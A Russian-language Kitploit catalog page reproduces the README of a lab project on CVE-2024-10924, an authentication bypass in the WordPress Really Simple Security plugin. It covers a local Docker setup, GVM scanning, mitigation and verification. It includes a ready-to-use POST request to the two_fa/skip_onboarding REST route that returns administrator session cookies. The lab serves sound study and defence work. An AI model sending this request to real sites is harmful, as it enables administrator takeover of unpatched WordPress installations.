Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-10924 — Демонстрирует эксплуатацию и смягчение CVE-2024-10924, обхода аутентификации в WordPress Really Simple Security, с автоматизированным Python-эксплойтом, ручными шагами в Burp Suite и проверкой исправления. | Kitploit
Инструменты/GitHubGitHub/bodoinon/cve-2024-10924
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияОбучение и Образование
GitHubbodoinon/cve-2024-10924

CVE-2024-10924

Демонстрирует эксплуатацию и смягчение CVE-2024-10924, обхода аутентификации в WordPress Really Simple Security, с автоматизированным Python-эксплойтом, ручными шагами в Burp Suite и проверкой исправления.

Репозиторий
69 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-10924 - Обход аутентификации в Really Simple Security

ОБЗОР

Этот проект демонстрирует эксплуатацию и устранение CVE-2024-10924, критической уязвимости обхода аутентификации в плагине WordPress "Really Simple Security".

ШАГ 1: НАСТРОЙКА СРЕДЫ

Запустите уязвимую среду WordPress: cd wordpress-really-simple-security-authn-bypass-vulnerable-application docker-compose up -d

Проверьте, что контейнеры запущены: docker ps

Доступ к WordPress: http://localhost:1337

Необходимые инструменты:

  • Python 3.x (для автоматической эксплуатации)
  • Burp Suite (для ручной эксплуатации)
  • GVM (Greenbone Vulnerability Management) для сканирования

ШАГ 2: СКАНИРОВАНИЕ УЯЗВИМОСТЕЙ

Запустите сканирование GVM по цели:

  • Цель: http://localhost:1337
  • Ожидаемый результат: обнаружена CVE-2024-10924
  • Серьёзность: Критическая (CVSS 9.8)
  • Уязвимая конечная точка: /reallysimplessl/v1/two_fa/skip_onboarding

ШАГ 3: ЭКСПЛУАТАЦИЯ

Метод A - Автоматизированный эксплойт на Python: python exploit.py

Метод B - Ручная эксплуатация через Burp Suite:

  1. Перехватите трафик к http://localhost:1337

  2. Отправьте POST-запрос: POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1 Host: localhost:1337 Content-Type: application/json

    {"user_id": 1, "login_nonce": "hack", "redirect_to": "/wp-admin/"}

  3. Наблюдайте ответ с заголовком Set-Cookie, содержащим сессию администратора

Ожидаемый результат:

  • Статус: 200 OK
  • Возвращены куки сессии администратора
  • Успешный обход без учётных данных

ШАГ 4: УСТРАНЕНИЕ

Примените патч для блокировки уязвимой конечной точки: .\patch.ps1

Что это делает:

  • Копирует mitigation.php в /wp-content/mu-plugins/ контейнера
  • Блокирует все запросы к уязвимой конечной точке REST API
  • Возвращает 403 Forbidden при попытках эксплуатации

ШАГ 5: ПРОВЕРКА

Повторный запуск эксплойта (Метод A или B): python exploit.py

Ожидаемый результат после устранения:

  • Статус: 403 Forbidden
  • Куки администратора не возвращаются
  • Атака успешно заблокирована

ДОПОЛНИТЕЛЬНЫЕ ЗАМЕТКИ

Чтобы остановить среду: docker-compose down

Чтобы просмотреть журналы контейнеров: docker-compose logs -f

Для легитимного доступа к администрированию WordPress: http://localhost:1337/wp-admin (Проверьте docker-compose.yml для получения учётных данных)

Скачать инструмент